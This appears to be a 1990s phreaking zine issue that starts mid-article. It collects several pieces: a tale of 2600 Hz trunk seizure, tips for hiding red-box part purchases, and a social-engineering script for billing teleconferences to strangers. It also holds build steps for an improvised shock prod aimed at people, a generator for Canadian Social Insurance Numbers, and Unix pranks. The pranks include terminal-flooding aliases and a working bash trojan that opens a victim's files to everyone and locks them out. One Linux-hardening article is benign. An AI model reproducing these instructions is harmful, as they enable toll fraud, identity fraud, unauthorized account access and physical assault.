bring service back to us. That revelation occurred at around nine in the
evening, a good twelve hours after the trouble began, (so they're a little
slow, we can't blame them, can we?) when I got a call from my girlfriend.

Since the lines were up, I figured now was as good as any time to see exactly
what kind of switching system they'd fired up, just hoping it wasn't ESS. I
quickly dialed up my self appointed 800 testline, 18004GAYASS, and whipped
out my 2600hz tone, proudly stored on my self-built recorder. I played it
into my newly awakened line. Beep. Click. Line available. I didn't send any
KP or ST tones, because I wasn't crazy, and I was well convinced that we
weren't on ESS. Was it xbar? SxS? I don't know, and I was too excited to find
out.

What to do? I did what any noble phreak would do. I called every phreak
I knew of in the Kansas City area. It was a virtual free for all. Anyone
could seize a trunk. Anyone could abuse anything on this ever-so-temporary
switching system that the phone companies were trying to make extinct. It was
like a dream, like a wonderful phone phreaking dream.

The gestapo never stopped by. They probably never knew I'd blown that tone,
because they'd gone back to a system that was apathetic to my nefarious
activities. The playing field had been leveled. The telco vs. the phreaks. It
was amazing. Just thinking about the possibilities made me smile. I could
call London, I could call anywhere; it'd be free. All those far off bbses I'd
never dared to call, for fear of oppressive phonebills... I could call them
with reckless abandon.

Though a joyous event, opportunity didn't last long. It seems like nothing
good ever does. They had ESS back up and running within two hours, but those
precious hours, they were a phreak's dream come true. Later that night while
watching the local news for a followup, things seemed to be well concluded
with the quote of a certain local anchor... "Malicious tampering deterred the
repair crews as they attempted to reinstate phone service in the area. The
tampering was believed to be caused by several youths with some electrical
skill."


If not the thrill of hearing a trunk seized, watching footage of the
switching equipment under four feet of water was the highlight of a memorable
day. To all of you phreaks living in the Kansas City area under the (816)
350, 373, 478, 503, and 795-XXXX exchanges, I hope you thoroughly enjoyed
this once in a lifetime opportunity.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Rat Shak Shopping Made Easy
by N-TREEG

Okay I know some of you guys have had a hard time getting the parts you need
out of your local Rat Shak for whatever your purposes are. This article is
to make your shopping experience a little more pleasurable and / or
successful. Note: "Rat Shak" is henceforth used to avoid all the evil
legalities.

"QUESTIONABLE" PARTS
Okay here's a little tid-bit for you. The employees can't sell you anything
they feel you are going to use for less-than-legal purposes. You'll cut out
a lot of your parts-finding frustration if you don't elude to it's uses,
whatever those might be ;-) Just don't bring up the parts' purposes
what-so-ever.

TIP #1: Do not go into Rat Shak with a list if it can be avoided.

If you must have a list here are a few things to keep in mind:
Try to keep it as short as possible. Only have on there a part number or
something if you know specifically what it is you want. The more vague it
is, the less the salesman can conclude from it.

It's also a little less suspicious if your list is hand-written. NEVER EVER
EVER go into Rat Shak with printed box plans in hand. That's getting you
nowhere fast! It's always best if you've got memorized the specific part you
need.

TIP #2: Never mention what the parts are going to be used for.

Don't bring it up. If the salesman asks, have some feasible alternative
ready to give that the part could be used for (plan ahead). You can always
say you're replacing the exact same part in a broken toy/gizmo/home project/
appliance, etc. Words to avoid mentioning: red box, descrambler, cable box,
linears, e-prom burners (I doubt they carry 'em), scanner mods, snarfers.


YOUR PURCHASE

TIP #3: Use common sense.

Use your head. Don't ask for two things that are obviously questionable in
the same sale. How much sense does it make to ask for a tone dialer then
turn right around and inquire about crystals. THINK!

TIP #4: The Name and Address bit.

Don't be alarmed when Rat Shak salesmen ask for your infos. They are
supposed to. No, it's not so they can track your purchases, etc. It's only
for their sales flyer. So don't worry about it. Don't give 'em a hard time
and you'll appear a little less suspicious. Plus you can sometimes find
coupons for free stuff in the flyers they send you. Who couldn't use free
batteries every once in a while?

"WE DON'T HAVE ANY"

TIP #5: Make use of the catalog.

So, you can't find what you're looking for on Rat Shak's shelves. No biggie.
Don't automatically assume they just don't want to sell you what it is you
need. Ask to see their yearly catalog. They are usually up on the counter.
Just thumb through them. (Or buy one, great to get parts numbers = no list!)
They've got an index in the back to speed your search. If it's not there
then it more than likely isn't regularly carried in stock. You've got
another option. Ask if you could thumb through their warehouse's catalog.
It's a bookstand that has about 8 or so ring binders beneath it. Flip one of
those open and search their. If you can find what you need in there, have
them order it for you.

OTHER STUFF

TIP #6: Don't try to "card" Rat Shak.

Trying to card Rat Shak is a nice way to get busted. Just don't do it. They
do verify credit cards, same thing for checks. They check signatures and ID
too. Save yourself and them a hassel, pay for your merchandaise.

Rat Shak's just a regular store with regular people for employees. They
don't want to give you a hassel. Just exercising common sense will make
your shopping experience more pleasurable for the both of you. They'll be
happy becuase they'll be making money, you'll be happy becuase you'll be
getting your part.


Remember if you can't get it at Rat Shak, there are other stores out there:

DigiKey - http://www.digikey.com

Mouser Electronics - http://www.mouser.com

Have fun kids...play nicely.

N-TREEG
HaX0r3d PerceptionS Productions / THTJ
Shouts out to: The THTJ Crew, #phreak, #hackphreak, PADmaster, Speed1,
Shoc, & The Spanish Mafia.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Telephone Conferencing
by DataThief

Well, i've recieved quite a few questions about setting up conferences
so i went on a search to find an article to suggest to the people that kept
asking me how, but i couldn't find one, so here it is...
Setting up a conference can be a useful and phun skill to have, and
it is alot easier than it would seem. There are a couple main teleconf.
services including:
AT&T Teleconferencing 800.232.1234
GTE Teleconferencing 800.483.9999
Alliance Teleconferencing varies (in large cities)

i usually use AT&T because they rarely validate u'r info and are extremely
gullible...

ok, here are the steps u take to setup a conf:
1) lookup a name in the phone book, write down the name and #
2) goto u'r fav. fonebooth and dial a conference # listed above
3) give them the info on the paper for the person to be the 'host'
(the person that gets charged for the call)
4) give them the payfone # as u'r number so they can call back
5) tell 'em what time u want it for and how long
6) choose dial-in or dial-out, if dial-in, choose how many ports
(people) to add to the conf.
7) make up some company name incase they ask u for one
8) hang-up and they'll call back in 1-5min
9) they'll either say "sorry charges not accepted" or "ok u'r conf.
will be up when u specified, thank you for using blah..blah..blah

A typical conversation will go like this:

<operator> Welcome to AT&T Teleconferencing Systems may i help you?
<you> yes, i'd like to setup a conference.
<op> who will be the host?
<you> host?
<op> the person paying the bill for the conference call
<you> oh, <name>
<op> phone # of the host
<you> <phone #>
<op> your name
<you> <fake name>
<op> your phone #?
<you> <payfone #>
<op> duration of the call
<you> 2hours <you can add more if u want>
<op> when will the call begin?
<you> 7:00CST
<op> is this gunna be a dial-in or dial-out conf?
<you> dial-in
<op> how many ports?
<you> 10
<op> okay, we're gunna hang up while i set it up and i'll give u a call in a
few min...okay?
<you> ok

...hang up...
...ring...

<you> hello
<op> hello this is at&t teleconf. is this Mr. <name u gave>
<you> yes
<op> okay your conf will be ready at <whenever>
your dial-in # is 800.xxx.xxxx
your host code is xxxxxx <don't use it unless at a payfone>
your guest code is xxxxxx <u can use this one anywhere>
<you> thanks

Things that can go wrong:
1) u called to set it up from home and the feds show up 2morrow
2) noone gets on within 15 min of the designated start time and it
auto-cancels the conf
3) they don't accept the charges <call right back and start over!>

one last thing about dial-in vs. dial-out
in dial-in, u get the codes, and anyone can dial-into the conf, but u can't
dial out to connect anyone.
in dial-out, only the host can add people, so u have to be at a payfone, but
its fun for pranks and stuff ;)

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
How To Make A Cattleprod
by The Messiah

Contents:
* Introduction
* Ingredients
* How To Get The Ingredients
* First Of All...
* Part 1 - Making The Baton
* Part 2 - Making The Power Pack
* Part 3 - Packaging And Use
* Words Of Wisdom


Introduction:
Have you ever wanted to shock the fuck out of an enemy? Ever wanted to
clear up the congestion in the halls of your local high school? Ever wanted a
hand buzzer similar to the one the Joker had in Batman? Well, this article is
for you. With a wee bit of cash and some ingenuity, you too can be armed with
a ~100-200 milliamperes shock rod.

Ingredients:
* One (1) automobile coil
* One (1) 12v lantern battery *** NOT A CAR BATTERY!!!! ***
* Some red wire
* Some black wire
* A little bit of green wire (not really necessary)
* One push-button switch (non-toggling)
* Two (2) feet of PVC pipe
* One (1) PVC cap
* Wire cutters, hacksaw, wire strippers, electrical tape
* The IQ God gave the average Republican (20)
* A copy of Screeching Weasel's Boogadaboogadaboogda album

How To Get The Ingredients:

You can get the auto coil at a salvage yard. It's a black cylinder with two
electrodes and a big post on the top. The battery, wire, button, tape, wire
cutters, and wire strippers can be found at your local Radio Shack. You can
pick up PVC pipe and cap at your local hardware store. The IQ thing should be
already taken care of. if it's not, you are so fucked. You can get the CD
from Lookout! Records.

First Of All...

This is a pretty big deal. Don't fuck around with this. Test it on a
voltometer before you try it out on your co-workers. All of your mistakes
will be dealt with be you; I assume no responsibility for anything you do.
Now that that's been said, put on the CD... groove with it...

Part 1 - Making The Baton

Making the actual baton (thing you whack the target with) is a personal
thing. It should be a reflection of your personality. Oh hell... Cut the PVC
pipe to a length of your liking. Now, take two pieces of wire (red and
black), about 3-4 feet long, and strip about 2 inches off the end. Thread
them through the pipe, then pull the stripped ends out the end, like this:

|| || = pipe
* = red wire (ground)
# = black wire (negative)

# *
# *
# *
|| # * ||
|| # * ||
|| # * ||
|| # * ||
|| # * ||

If the wires touch, the circut shorts out, and does absolutely jack shit. So
make sure they don't. The more contact the baton has with skin, the bigger the
shock. Take the PVC cap and drill two holes in it, spaced evenly:
___
/ \
| * |
| * |
\___/

Thread the ends of the stripped wire through the holes in the caps and screw
the cap on.


Part 2 - Making The Power Pack

This is the heart of the cattle prod. Here's a diagram:

* = red wire (ground)
# = black wire (negative)
$ = green wire (positive)

# * <-- from baton
# *
# *
# * _--_ <--- button
# * $$$$$$$$|____|$$$$$$$$
# _*_ $ $ #######
# | | $ + - #
#####- | | + __|__________|__ #
# _|_| |_|_ | | #
# | | | | #
# | | | | #
# | | | | #
# | | | battery | #
# | | <-- auto coil | | #
# | | |________________| #
# | | #
# |___________| #
# #
####################################################


Part 3 - Packaging And Use

You can put the power pack in a backpack or something, because carrying it is
all funky. To shock someone, touch the two wires at the end of the baton to
their arm or whatever and push the button. Zap.

Words Of Wisdom:

A couple of things- one, *** DO NOT *** use a car battery for the
battery. If you shock someone with a car battery, it will kill the person, or
fuck them up seriously. Please don't kill anyone, k? Also, this kind of setup
tends to drain batteries. A 12v lantern battery will last for about 10-20
shocks.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Securing Linux
by KiDMaGiC

When discussing Linux and networking, one often comes upon a taxing
problem. This problem, to many administrators, can either be a burden
to install or a godsend of smooth sailing. However, if you are in a
situation where the former is true, I will attempt to make this a bit
easier.

Many months ago, back in my earlier days of using Linux, I was gullable
and offered shells off of my slow 28.8 connection, which neither my ISP
nor my machine appreciated. One of the people I (unknowingly) gave a
shell to, unfortunately knew more about slackware 3.0's security than I
did, and had rm -rf / going within seconds. At that point in time, I
realized security was a must for any Linux box connected to the internet.
Your personal LAN or WAN may be different in its breed and creed of users,
but its much better to be safe, than sorry.

The first thing that everyone I asked told me to do, was to install shadow
passwords. This is an incredibly important step which involves using a
random SALT to encrypt your passwords. This generally is much harder to
break, and can save you a break-in due to unprotected crypt passwords.
Even tho shadow passwords can be slightly difficult to install for a new
Linux user, the benefits outweigh the trials.

Another good idea is to install a tcp wrapper. These can be found on
sunsite(ftp://sunsite.unc.edu/pub/Linux/) and are generally just good
ideas. These can be your alternative to firewalls, but have less
functions. Basically, a tcp wrapper checks the address of an incoming tcp
packet (such as a packet for telnet, ftp, finger, etc.) and compares it to
a group of files. These files contain a list of addresses, what services
they can use, and wether or not the address should be allowed or denied.
I find this my primary defense in the brutal world of "
drive-by" attacks.

If you happen to be a security/encryption nut like myself, you may also
wish to get such utilities as pgp and ssh. PGP is the acronym for Pretty
Good Privacy, which is "
encryption for the masses." This little program
is very efficient in encoding anything you want to keep secure, from
emails to book reports to sensitive source code. This is an invaluable
tool to have, and also just fun to play with with your friends. SSH, or
secure shell, is similar to rsh, but offers advanced encryption options to
avoid your connection being monitored by an outside third party. This is
another invaluable tool if you have reason to believe people are out to
foil your plans of world domination. :)

These are just a small few of the many options you can explore for
security. Things such as firewalls, network monitoring software, and
packet sniffers are just too in-depth to touch base with in this article.
However, information is abundant on the net, and many people would be
happy to help you if you have a serious question.


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Social Insurance Numbers
by Devix

In Canada (where I live) to get a job you must have a Social Insurance
Number (SIN). I don't know much about them or why they are used but
I do know how they are validated (and thus generated) so I thought I
would share this info with all of you. This can be useful for numerous
reasons but I'll leave that up to you to figure out. I don't know if
this will work with the US equivalent, Social Security Number (SSN).

OK, the Social Insurance Number is made up of 9 positive integers.
To validate, the first 8 are put through an algorithm to determine
the 9th. If the 9th matches, then the SIN is valid.

Here is how the algorithm works:

1. Find the sum of the 1st, 3rd, 5th, and 7th digits.
2. Find the products of the following:
2 * 2nd digit
2 * 4th digit
2 * 6th digit
2 * 8th digit
3. Add the products of part 2 (above).
4. Add part 1 and part 3 together.
5. Take the ones digit from part 4 and subtract it from 10. The result
should be the 9th digit.

If you don't understand the above, here is a program I made in QBasic
that will generate and validate Social Insurance Numbers for you.

---------------------------Start Cutting----------------------------

RANDOMIZE TIMER
COLOR 12
PRINT
PRINT "
Social Insurance Numbers - Canadian"
PRINT "
Made by Devix - datadaze@hotmail.com"
PRINT
COLOR 7
1
PRINT "
(G)enerate or (V)alidate?"
6
choice$ = INKEY$ 'Wait until key is pressed.
IF choice$ = "" GOTO 6
choice$ = LCASE$(choice$)
IF choice$ = "
g" THEN GOTO 5 'If g the make sin
IF choice$ = "
v" THEN GOTO 3 'If v then check sin
GOTO 1

5 'We're make a SIN!
a = INT(8 * RND + 1) 'Use random numbers for the first 8
b = INT(8 * RND + 1)
c = INT(8 * RND + 1)
d = INT(8 * RND + 1)
e = INT(8 * RND + 1)
f = INT(8 * RND + 1)
g = INT(8 * RND + 1)
h = INT(8 * RND + 1)
k = a + c + e + g 'Add them
l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them
m = k + l 'Add them
2 IF m > 10 THEN m = m - 10: GOTO 2 'Get the last digit.
COLOR 2
PRINT
FOR i = 0 TO 9 'Get the check digit.
IF i = 10 - m THEN PRINT a; b; c; d; e; f; g; h; i: COLOR 7: END
NEXT i 'Not found, go on to next.
COLOR 7
END

3 'Were checkin a SIN!
PRINT
PRINT "
Numbers seperated by comma's."
PRINT "
ie: 1,2,8,3,9,5,5,8,5"
INPUT a, b, c, d, e, f, g, h, i 'Get the numbers
k = a + c + e + g 'Add them
l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them
m = k + l 'Add them
4 IF m > 10 THEN m = m - 10: GOTO 4 'Get the check digit.
PRINT
COLOR 2
IF i = 10 - m THEN PRINT "
Valid!" ELSE PRINT "Invalid!" 'If digit is right,
COLOR 7 'then tell the guy.

---------------------------Stop Cutting-----------------------------

I've also included a program I made in vb that does the same thing.
(sin.zip). Source code is encluded. Enjoy!

begin 644 sin.zip
M4$L#!!0````(`!F##R-E7`8W@0,``.P&```,````1E)-7TU!24XN1E)-;51-
M;!M%%/YF=M;=V*9)K!Q*!>H"
4525RB25@!($`D);68*H:JJJXF+9R2:Q\$\P
MZ\;-Q1'RQ1=??""72E4B40G(A3,2%ASH@4H<X=)<MJH4%2@G7TB7]\:[86VS
MDM]^[YMOYCV_^6S_E_,PRP+(@QYKM5K*?IPKE)][6<S`Q\12.I->3-M7G+)3
MS;F5JM'M=F%>4<`#$_@Z#GQ![^<%/L`K/CW3YN5*M33W.BO>8,F;K+G((E^\
M2A6,9-XM9V_DBH65G.LH']8QOFNNBQ_4VV)2PC=8*[4VJ*VUQ_BN>0%:*TA[
MAK0B[M;=[&*ME'>JTE=U\%DOBA35-?BKF;&/<GFG."=\O+]0=>B,%3M_V_[0
MN56HS]LK_'K/77<VG+*;6ZN4T\N5DKVYN9D>XE[32K..7^7CL3694IB29ZC$
M.2JAXL5\,6B!RISHHWD2UW$@?T+*`$FENDW#^,>4&$=69,48A#14+&%:\>VK
MVU=/T%6<IL,V4,,6&FBBA38ZV"
=N!W>PR]>$(TAQB/][/L%W%._!&^+YW/M`
M*CK1[$*QL/PIL"UR#RGD&2US6.E2<!BM<ECCL/X7!2TN<B@!,4EG$BQ0B$R?
M)W'=J;L(JH7W&U:#S"
WW(*74F[7<K<S-\GF&IC8X?&81/H4Q6/"#AX0P!%(8
M_0["
FGTB6`_<1(R&`&X-O^-+BI[]`$_AJ3U\CR0-=IBIC3!;(TQCA&F.,*T1
MICW"=(A)4`\)JK%'L:ECFV*2KI?7:O"LI_B34"-`K&A%<.<8)\D0O&>'/G=T
MODLS\OU[E._"
.WN`2[@L^KBG5V-8('/PGGWJR9M^E]3G9)"?964/7R$#F[A'
MF-6][N';`-<TW@NRK8&L,9`U![+60-8>R#H#V7Z0)<C&*72ITXM!MXO4:8SP
M6]H3ENA[8HH]@<`3@TXC3SR+>.)^X`D^>9)._A'C)[WIOVE"
:;R#=?G?"LU%
M_8QO=I)J(Z+WK)"
M1=EDR&Y%V8F0;439J9!M1ME3(=N*LB^$;#O*VB';B;+3
M(<M_$@GJ.J&TNY1VE]+N4D=Z[=A=*N(N%7&7BKA+\0\\03L3A-A=A]I=/:I\
M&+CK-]''/;W*[NKI.GTW'6HW7<)Y&?;Z!R;P3,1A%SZW]76]!*KD$7\2IZ6%
MI<RBG2FO5H`9<0&KD7TIS,NDWI<IWQK:>7-H9^B2:X%+)K5+COX%4$L#!!0`
M```(`"V##R/6#>&W<````'X````,````4%)/2D5#5#$N34%+<PORC?=U]/33
M`S)XN0**\K/"
,_.",ZM2;<U-=(PM3'6,3(UT#(V,$'(9^>6V0*YG<GZ>6WY1
MKJU26E%NO&]B9IX2+U=(9DE.JJU2L)ZGGI^>@GMJ7FI18DE^$5#&M2+5+S$7
M).?I%PZTSC7"
%2@*`%!+`P04````"``Z@P\C69NER\0(``!`'```"@```%-)
M3E=)3BY%6$7M67U05-<5/^]CW66%94&J8G!Y2\@V55P0$;;L(A_!Q94/&31J
M"1&7L.`ZN&N7MT)LK*O^@ZZ2Z4QFTK':M.I?F8ZQ+3-5FE$41ZH6JXW3(;93
M.VE:=8RV:CO2$;D]][ZW"
,MJVIDTQC1G>>^>W_FZ][YW[KL?5-<3T`"`A!<A
M,$8E>''P*30%OJ)GG'8/+?A]]\7PGY?7'DWD:L__5#K*P0=#.X8Y.:'7)/3$
M#9J/<#U5@^:>G$&S0VC7H/#FC>XI6;"
@+SQ\C!#+MJ+:TN!TR[8M_(HE08,E
MM$4L"FKW!#4[\W\@H++#&TRC2E]S,`5+T1L(QJ/1E**@IM<EW/SAW<,6FR9X
M;,\68>>B_4)/ZJ!9+#T^Q'>)SC-B(5X-SIZ*G\&@>?=0=]^)(3ZW[Y@3[AY>
M%MI"
&F3QC*:AXOA%/FRXP-\[U#O$'X6B07,@\>`[PLTENR]V#V%C;]A)&%NR
M8Y3(M[I-61`>#3E`_N@G#KLLZON"]\,7YOYFQ[\X^5KX/H:_=V@9]:-MO[FO
M=Y-PX^$H[6L8FX8U$W+W\/U+X0_#EVAKCF\#RZXJLNLDW^_X;L=O+5WE)/>6
M<&>/K?3AO4,C)U![1B-5A//W"
ZS>\ZY[AY0.*&%H"%K7C_<+PJFYE]IUF8GB
M'=NIP$Y:V7':%&H1-KTC'&^``?']T8%RG@P.E(OFGH'R*8N0TYEO#)3KOP\]
MQ1BR%SC3RO,ZZ/#ZK*_Y-WQ&V;%BG;==VACPMP;<&Z2`Y]M!;\#3+E5[7POX
MV_TMLK3*ZVOV=[1;$_29W_(')7?`([G;`AYW\^M2(.CS>7VML8U?]KF;VCR2
M[)?:97=`CFTT_G/T%?V/J&:Q1C\"
/#@7UU4D"SR`$6J-[,O/@XAE&LX$Z^!C
M^#O<A5'VO=?A/,'K5'=!!ZE0.SN5@:1X'@Q@XXRS;5P<;!>-:=O%2#TZ,(24
M^81&STGC0LP]Q"
N>6%M$-@T$Y'G&ZT,:II\^3C^3\8I^%N-%QJ>QN)K0Y#[J
MEKMJ5KEJ&(]MT*TLJWNY9D%.#L9:;G59:ZQ2A<?G";AE?P#^WVDO'74<?<4@
M<$G(->,CGH&OY$M*E:[WZDKD2M>Y@G^FANS?*_#9S]GO&"
]GSX+),E,,648,
MF26&;$X,F36&+#>&+!]EYGFSP#PO`ZZ6F.?-8?=<O%_.+F0Z$PP7'#&L+;V`
MO&6,IU;6"2A_'+J<O8CY%F+<12Q6&7A<A'"(R^!%VQ'#J?*>O'PN@M:74HO5
MKM)T`U?I2LQUPBV,E8&:@N=FDED\C>5DEM1C?>FZ\E_D&5&:9\L!*IN%==0:
MS\H1;%)Q15%$DC%)8IDDF3-)8ITDR9TDR9\D<8Y)^I-\2ZL@4#6UK]+UR4*E
M9SK33+(4>_FA9XWA%4.EBUK$H<5!XUO!1-;GS?ALROBEZ6^(C[1O&>/QF7S'
M0*_W@[],JC7:LFMAHGXX2E\7I1^-TJ^(THNVB?J547I]E'YUE-X8I:^/TD^/
MTC=$Z=.B]&NB]!E1^K6H/Y!5"P>R5L`'M@-9J]F]`>^V[":FJ\-G\C?;!>16
MJARUJ!_'KQGC;=G-S*<)XS5CC".&R]DM+&L%S-J6L:S]1(@@FK4M+&M/"]1S
M+;Y])4=;6([VY)6(D?;OM1DA6=2#A(N>E>XV;[,9H#_I:LE!XU\*]MH,8!5U
M@%.)Y/*U^`'^43>Z</,XWV2H$>.9K\NW*89W6Y1W)+O@*5.J.L-&]GLV:'2(
M.(^O<O`0,BHV73@A_)Q;YDC#>7PKRHE*@&L$X"A'_>N9;3.7[9@)^^!MNQY"
MM1+PZLY2S[_GRD#^(1E-?.0/X_R5N7X.7+.+N+4<L#^J?PE>KW(G[-,?ZW\=
MF4X&X[$?>5AFH==9IC?QBG4F;^%&$XV<@E*8M0.O;B6,ZG<%_3@N$WW>$!7+
M[5B.)IX1%)0$F3RUYN$V[?TS3[0GDL2S_N=P%$L27:.)<)VGJ\`O-[VHGGV4
MJ!D`\/B##YIP)":=)&3$L97TCZ0/%X]H'Y"1=+RV/B`/R9.OD^3!2!%YT'^2
M##N*L21DN)B@_+\E6C]L)7V0/@R@Q8N66X=Q:/SG5S$9%CZ]?OA2OW]E/(<>
MF_0A]@>AD%+0'Q7AK:^OCV8(^Z.?.U;0'Q5]GH_M3:+=.!X1HNU0!3KE%6H[
M%$'DE4;T8W@C3,``GR?NZAJ/'R&**;I].X(G(DI/0D^9R)/&;>CIC5M!VA8B
M9&R#3'=\D_?$S@0QY`3"G5X"SKKJQNI25XT5&;1?S3;AST$QC;6:H[OPV2K`
M062"=!4(=)2958"C+`.>5P%.^IGP@@KP@,$"7U>!EH[.;ZA`1Q<&<U401V?W
M>2K0`U@A6P53`7)@O@H2V$Z64X`18"
'DJYHD@`)<Z"@@&>";4*B":0!V7!0H
M((7.?Y$`N/98A'(%S*!?C%(5S`0H@Y=4D`F0,N;S`D`Y+%8T"
DT`7Q#R.Y32
MQOD=EK'_`XR_T^.>M^TD?IFCT;&*6;,U8/RC_$J!5K8N5%9COV)K1IUZ\A,/
M-!4PC4(4BPS5L\3Y[*F>K1;7JS5&:!\]2P(MM-HYN(([W'.X7^@E&GB7:/'$
M(PYVD:FPF23`>I((];C"6TJF02'Y&LPA,\!40L^=KI._DH_)1^1/Y(_D#^0*
M&2*_(Y?):8RE977%5:D=>\:(_#H+-"
TX<%]A,"&#L^"L98S^!@AT?M-48!<'
M<<"^BV-N.Y:I'";^\VQIK7'Z`QOF+Z06^=2D@-K8J!&F1#[]T(!(\.B-;HS<
MLD?\D68==T*T<TF8-%.YF`LN(5\YA40WM1W4+1>8&P[LJ6=C]DA0MC(\$3N!
MUC&;2Z:-$%YE.PR.0.E+>$(M>YJEIM>E<L\F;V>AU$R+$GF=9Z/')[M;_>P,
M7>KHZ+!&R;*9I:83+O+7XEKY9!%2^'0:W<PR&Z-K:X(;FCR!0K3IA*M\/R0+
M0"WX+^9>0=<2V-!8[?;Z]'*GW*BT/;Y)]C5&'CD#D=>F;VMJ4XVF5+F;/&WS
M_PU02P$"
%``4````"``9@P\C95P&-X$#``#L!@``#````````````"``````
M````1E)-7TU!24XN1E)-4$L!`A0`%`````@`+8,/(]8-X;=P````?@````P`
M`````````0`@````JP,``%!23TI%0U0Q+DU!2U!+`0(4`!0````(`#J##R-9
MFZ7+Q`@``$`<```*````````````(````$4$``!324Y724XN15A%4$L%!@``
0```#``,`K````#$-````````
`
end

Devix - devix@thepentagon.com
www.thepentagon.com/devix
PGP key available above. Use it.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Stupid Unix Pranks
by The Darkling

Terminal flooding Is a very annoying and a great way to make people
look stupid. However this requires something. Go into /dev and type ls -la
ttyp?. This will get you a listing of the permisions on the ttyps. For
any reason should you have right accsess to any ttyp# (that stands for ttyp
number) you can do this. Another thing you can do is if they ever leave their
computer un-attended walk over to it, type who am i (for your user name) and
then type who username for their ttyp number. then type cd /dev and then
chmod a+rwx ttyp(their ttyp#) ( Side note: chmod is a change permissions
command. a = all and a+rwx gives people read write and exacute perms on it).
this setting will stick threw all of their ttyp's (they change every time).
Most default settings give you write accsess to other peoples ttyps. Don't
ask me why, but they do. Now we have to write a couple scripts to do the
terminal flood and to setup for it other times. Asuming you don't have a
.bash_profile I am now going to go threw what it is and how we will use it.
.bash_profile is a file that will run everytime you login asuming you are
using a bash shell. if not.. type /bin/bash now and load one. here is the
heading for your .bash_profile (and every other bash script)

!#/bin/bash

this means that we are sending commands to the bash shell.. its just propper
form, and some whate unessary if your using a bash shell. now what were going
to do is setup a little rutine that wil grab us everyons login name and ttype
number so we can check this when ever. I have mine setup so that it tells me
eveyones in the begging and writes it to a file (that re-freshes everytime)
in my home dir called flowers. here it is, I'll go over it in a sec


!#/bin/bash
who
who > flowers
alias flood='cat /etc/wmtp > /dev/ttyp$1'
alias fuck='echo Fuck You > /dev/ttyp$1'
alias w='who'
alias hehe="echo You were flooded curtusy of The Night script
www.wilter.com/Darkling/ > /dev/ttpy$1'


Now save it. Exit your shell and log backin for the changes to take affect
now. As you enter you will be presented with a list of peoples names and
ttyps, as a off note this information can also be seen in the file named
flowers. Also you might want to get the above source out of the html code.
Just so it isn't
fucked over when you put it in. If you need to see the information quickly,
just type w and then enter and you will see it again. When we want to flood
some one we type flood # ( or flood space their ttyp number ) and the entire
contents of wmpt (usaly f***** huge) will be dumped to their screen.
Similarly if you type fuck # (fuck space their ttyp number) they will get a
Fuck You added to where ever their curser is, or was. its halurs if their
e-mailing the root and you do it just ebfor they send it. The fuck you is
added to the mail message then its sent... you get the picuter =0). Also
after every day of tortue it would be nice to me if you would type hehe #
(hehe space ttyp #) wich broadcasts a advertisment about this page.

#2
This is what I call a Joke Trojen. While this method could be used to
do some very bad things I don't really condone them. Warning: This could get
you kicked out of unix class and if your school is tight as mine maybe given
the big boot. Use with caution. The entire Idea behind this is that we need
someone dumb enough to run a program you give them. this program will be a
trojen horse that will efectivly lock them out and give you RWX on everything
they own. My unix may be a bit rusty as I'm writing this up after unix class,
but everything should work. First 'know thi victem, sayith the lord' this
person has to be someone that has something you want, and will run a program
without thinking about it. Once you have chosen your victem, make the
following bash script:

<--- begin code --->

#!/bin/bash
echo you stupid dick
chmod a+rwx *
echo logout > .bash_profile
cd /home/yourusername
echo The hit is made sir > YES
echo bye
logout

<--- End code --->

Now make type
chmod g=x filename
chmod o=x filename
chmod a+xw /home/yourusername

Make sure to have named it someting like runme or some name that some one
would think it a little program that is kewl and safe to run. We before
denied read or write accsess to it so they can't see its true nature (except
root), so they should not fear it. Place it in their /home/username/ dir and
wait for the file YES to appear in your home dir. be sure to fill in the vars
like yourusername and filename (your user name adn whatever you name the
file). The effect of the trojen above goes like this :

it says to their screen 'you stupid dick'
it gives everyone read write and exacute perms to their files (all!)
it makes it so their startup files makes them logout (so they can't log back
in.. )
it goes to your dir
it makes a file called YES with the insides 'The hit is made sir'
it tells them 'bye'
it logs them out.

I personely like it.. its very effective. if you have the right setup perms
on yourstuff ( shown above with the chmod commands) then it all should work.
Go have fun in their dir.. then remove the logout from their .bash_profile
before they report to the teacher that some one put a trojen in their dir. =)

The Darkling

Contact:

Darkling69@mintprimary.com
http://www.wilter.com/~Darkling/ (soon to be)

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Oddville, THTJ

